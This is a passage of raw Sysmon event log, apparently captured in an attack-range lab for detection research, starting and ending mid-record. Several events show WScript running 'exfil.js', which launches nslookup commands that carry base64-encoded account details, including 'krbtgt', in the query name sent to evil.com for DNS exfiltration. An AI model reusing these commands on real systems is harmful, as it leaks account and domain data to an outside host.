EL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.913{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6844-000000005F02}6244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.913{2E1864BB-18E0-629A-6742-000000005F02}39766216C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-6844-000000005F02}6244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.913{2E1864BB-18F0-629A-6844-000000005F02}6244C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsnu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.897{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nloew.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.882{2E1864BB-18F0-629A-6644-000000005F02}25122516C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-6744-000000005F02}7476C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.882{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.882{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.882{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6744-000000005F02}7476C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.882{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.882{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.882{2E1864BB-18F0-629A-6544-000000005F02}35488160C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-6744-000000005F02}7476C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.882{2E1864BB-18F0-629A-6744-000000005F02}7476C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-6544-000000005F02}3548C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloew.tmp 2>&1 22542200x8000000000000000210816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.871{00000000-0000-0000-0000-000000000000}4364evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.782{00000000-0000-0000-0000-000000000000}7000evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.687{00000000-0000-0000-0000-000000000000}2944evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.601{00000000-0000-0000-0000-000000000000}7240evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.525{00000000-0000-0000-0000-000000000000}5168evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.457{00000000-0000-0000-0000-000000000000}7204evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.395{00000000-0000-0000-0000-000000000000}5136evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.315{00000000-0000-0000-0000-000000000000}724evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.223{00000000-0000-0000-0000-000000000000}3916evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.111{00000000-0000-0000-0000-000000000000}2792evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.052{00000000-0000-0000-0000-000000000000}6508evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.960{00000000-0000-0000-0000-000000000000}5404evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000210804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.860{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-6644-000000005F02}2512C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.860{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-6644-000000005F02}2512C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.844{2E1864BB-18F0-629A-6644-000000005F02}25122516C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-6544-000000005F02}3548C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.844{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6644-000000005F02}2512C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.829{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6544-000000005F02}3548C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.829{2E1864BB-18E0-629A-6742-000000005F02}39762236C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-6544-000000005F02}3548C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.837{2E1864BB-18F0-629A-6544-000000005F02}3548C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloew.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.829{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwgok.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.782{2E1864BB-18F0-629A-6344-000000005F02}62247396C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-6444-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.782{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 